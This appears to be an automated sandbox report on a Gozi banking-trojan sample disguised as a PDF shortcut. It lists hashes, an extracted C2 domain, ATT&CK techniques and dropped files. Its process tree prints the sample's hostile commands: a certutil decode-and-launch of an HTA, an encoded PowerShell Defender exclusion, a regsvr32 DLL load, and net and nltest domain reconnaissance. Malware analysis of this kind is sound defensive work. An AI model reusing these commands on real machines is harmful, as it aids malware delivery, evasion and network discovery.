Analysis

  • max time kernel
    149s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    23-02-2023 06:07

General

  • Target

    metaplatform02.pdf..lnk

  • Size

    293.6MB

  • MD5

    d8564cb88267993101b3f0f54048c6a4

  • SHA1

    75dad371e05629179c7e30bd24a068553336aefd

  • SHA256

    e80e664931e44044b7d162100524858755203db39402ddc8f816a508404ea3c5

  • SHA512

    a41b87daa0aea3057a4e1cdd29a7aa81e488880e714139529c75bc714ac803dd43e6a0acac143d2c3edbfac4582205c66e822c4561e817a4337fcb910abb0d57

  • SSDEEP

    24576:87MkCMWioaEMPQjw1coi5qsSrKz6Fwoh73sVDGSQ7wqfU:0hQRoAz6quxhC

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

1000

C2

https://colodart.top

Attributes
  • host_keep_time

    2

  • host_shift_time

    1

  • idle_time

    1

  • request_time

    10

aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Blocklisted process makes network request 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Runs net.exe
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\metaplatform02.pdf..lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1588
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c if exist C:\Users\Admin\AppData\Local\Temp\temp1_mplatform.zip\metaplatform02.pdf..lnk (certutil.exe -decode C:\Users\Admin\AppData\Local\Temp\temp1_mplatform.zip\metaplatform02.pdf..lnk C:\Users\Admin\AppData\Local\Temp\.hta&start C:\Users\Admin\AppData\Local\Temp\.hta)else (certutil -decode metaplatform02.pdf..lnk C:\Users\Admin\AppData\Local\Temp\.hta&start C:\Users\Admin\AppData\Local\Temp\.hta)
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1940
      • C:\Windows\system32\certutil.exe
        certutil -decode metaplatform02.pdf..lnk C:\Users\Admin\AppData\Local\Temp\.hta
        3⤵
          PID:1692
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\.hta"
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Modifies system certificate store
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of WriteProcessMemory
          PID:644
          • C:\Windows\SysWOW64\timeout.exe
            "C:\Windows\System32\timeout.exe" /t 30
            4⤵
            • Delays execution with timeout.exe
            PID:688
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAIgA7AHQAaQBtAGUAbwB1AHQAIAAxADUA
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1352
            • C:\Windows\SysWOW64\timeout.exe
              "C:\Windows\system32\timeout.exe" 15
              5⤵
              • Delays execution with timeout.exe
              PID:1528
          • C:\Windows\SysWOW64\regsvr32.exe
            regsvr32 /s C:\Users\Admin\AppData\Local\Temp\x.dll
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1588
            • C:\Windows\system32\regsvr32.exe
              /s C:\Users\Admin\AppData\Local\Temp\x.dll
              5⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:888
              • C:\Windows\system32\cmd.exe
                cmd /c "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\7FB0.tmp
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1592
                • C:\Windows\system32\net.exe
                  net group "domain computers" /domain
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:772
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 group "domain computers" /domain
                    8⤵
                      PID:1780
                • C:\Windows\system32\cmd.exe
                  cmd /c "nltest /dclist:" >> C:\Users\Admin\AppData\Local\Temp\4B5C.tmp
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1748
                  • C:\Windows\system32\nltest.exe
                    nltest /dclist:
                    7⤵
                      PID:1168
        • C:\Windows\explorer.exe
          "C:\Windows\explorer.exe"
          1⤵
            PID:1976
          • C:\Windows\explorer.exe
            "C:\Windows\explorer.exe"
            1⤵
              PID:268
            • C:\Windows\system32\AUDIODG.EXE
              C:\Windows\system32\AUDIODG.EXE 0x518
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1684

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Defense Evasion

            Modify Registry

            2
            T1112

            Install Root Certificate

            1
            T1130

            Discovery

            System Information Discovery

            1
            T1082

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              Filesize

              342B

              MD5

              ecb6d1bde86c77e5258e0c389ab07640

              SHA1

              85de14be97847a3d44316b8c99065e9142a026a5

              SHA256

              e83c8cc0bb431d66c83cf0888d85b8c333defc1a41bf7e103064db66c52eb32b

              SHA512

              3e7c6f9767202df55609a6cea1185f7efb8058ecbb038fe0175a8b11dfe1631fd2d3de89bd6c757fbeaacff1a12e3157c0ba3617f9a88682bcc984dc7c609112

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              Filesize

              342B

              MD5

              44d7b6c1d601a0b4b40035c8b2a54add

              SHA1

              46de1fbd84a89fd338a7d8e5730180c86926c098

              SHA256

              a7d5ae813bcb5af5f3d53d76a45b9d82f8ff77f28ef97c40da8f3a721ec4b26f

              SHA512

              929a547d5c1157a01a5aa709b1938514a530063f414c149c03fc5c104ad76b7ec54103d9fc27e0bda1ba2495a920ed4d7e823a984ccadee1ecfc014efaeb447e

            • C:\Users\Admin\AppData\Local\Temp\.hta
              Filesize

              29.4MB

              MD5

              31c3b2996567f246db9e134fd2f0df7d

              SHA1

              4b7c90a53bf6b56e64fff86ba87a27aa742e9310

              SHA256

              9738aa16bc292b49423c290c09136c40d0e08727595f7e8e5a44496bb4af7228

              SHA512

              e30d7170d743a8bfe0e8b4c44d6ed82a901c0289c8f595ae18e74dc80f5a67813babb3de39f5ed72cdf522e2868024eeb467a2907d5e8056e8a7017735625613

            • C:\Users\Admin\AppData\Local\Temp\4B5C.tmp
              Filesize

              36B

              MD5

              c58986635c266e6c06609b908580bede

              SHA1

              4672dce03d3dd9560cf74035aff3d9aebb7201e4

              SHA256

              a2f1bb2817f976e129974b003e3ec12fb8a644c1952bb667116317fd26416042

              SHA512

              36241e4bda8ad7e4137624bbfbb999c643d34a2095ba078f9886d92f4726913bdb9dc1e1f44141a6738c1e4d9042b802e49f774c0f1c6901735f4b069834449f

            • C:\Users\Admin\AppData\Local\Temp\7FB0.tmp
              Filesize

              78B

              MD5

              aaec14b2de8e2fdaf8427672122af65c

              SHA1

              ca953efad669c93af85b968d747baa544d4465fb

              SHA256

              14c94c44d0eb89a820d96e1791f4b754c87ee778b5f4478289df0fb22e1c3da1

              SHA512

              a5cbad3de5070fdcd6aa7f3f5eda42b69faef44a431cf48e20ca1f4f42c648ee80bd5f1d9b981624ae6b39e2435b4278c9fd1e97491e3b244a2bba7d629021a8

            • C:\Users\Admin\AppData\Local\Temp\CabA2A8.tmp
              Filesize

              61KB

              MD5

              fc4666cbca561e864e7fdf883a9e6661

              SHA1

              2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

              SHA256

              10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

              SHA512

              c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

            • C:\Users\Admin\AppData\Local\Temp\TarA2F9.tmp
              Filesize

              161KB

              MD5

              73b4b714b42fc9a6aaefd0ae59adb009

              SHA1

              efdaffd5b0ad21913d22001d91bf6c19ecb4ac41

              SHA256

              c0cf8cc04c34b5b80a2d86ad0eafb2dd71436f070c86b0321fba0201879625fd

              SHA512

              73af3c51b15f89237552b1718bef21fd80788fa416bab2cb2e7fb3a60d56249a716eda0d2dd68ab643752272640e7eaaaf57ce64bcb38373ddc3d035fb8d57cd

            • C:\Users\Admin\AppData\Local\Temp\x.dll
              Filesize

              334.4MB

              MD5

              12385eaa57c3fc38cb2e10ea348a14d0

              SHA1

              a49dfb815c67d47326f4d823ad8b79101e099754

              SHA256

              31a4be5978fffc0eadb06152d391ec6b9884c71c8956ef204dd85695e8724976

              SHA512

              dea2270662875f520325b38e4d18692cae0d4286c52dab93ba5c6fe62c34d9554743645526214960daef8cae50d0730f377bcf7ae74faacea489c3d6c037111a

            • \Users\Admin\AppData\Local\Temp\x.dll
              Filesize

              334.4MB

              MD5

              12385eaa57c3fc38cb2e10ea348a14d0

              SHA1

              a49dfb815c67d47326f4d823ad8b79101e099754

              SHA256

              31a4be5978fffc0eadb06152d391ec6b9884c71c8956ef204dd85695e8724976

              SHA512

              dea2270662875f520325b38e4d18692cae0d4286c52dab93ba5c6fe62c34d9554743645526214960daef8cae50d0730f377bcf7ae74faacea489c3d6c037111a

            • \Users\Admin\AppData\Local\Temp\x.dll
              Filesize

              334.4MB

              MD5

              12385eaa57c3fc38cb2e10ea348a14d0

              SHA1

              a49dfb815c67d47326f4d823ad8b79101e099754

              SHA256

              31a4be5978fffc0eadb06152d391ec6b9884c71c8956ef204dd85695e8724976

              SHA512

              dea2270662875f520325b38e4d18692cae0d4286c52dab93ba5c6fe62c34d9554743645526214960daef8cae50d0730f377bcf7ae74faacea489c3d6c037111a

            • memory/888-212-0x00000000005B0000-0x00000000005C3000-memory.dmp
              Filesize

              76KB

            • memory/888-208-0x0000000180000000-0x0000000180014000-memory.dmp
              Filesize

              80KB

            • memory/888-206-0x0000000001D50000-0x0000000001E03000-memory.dmp
              Filesize

              716KB

            • memory/888-215-0x0000000000580000-0x0000000000581000-memory.dmp
              Filesize

              4KB

            • memory/888-237-0x0000000001D50000-0x0000000001E03000-memory.dmp
              Filesize

              716KB

            • memory/888-241-0x0000000001D50000-0x0000000001E03000-memory.dmp
              Filesize

              716KB

            • memory/1352-200-0x00000000024C0000-0x0000000002500000-memory.dmp
              Filesize

              256KB

            • memory/1352-201-0x00000000024C0000-0x0000000002500000-memory.dmp
              Filesize

              256KB

            • memory/1352-199-0x00000000024C0000-0x0000000002500000-memory.dmp
              Filesize

              256KB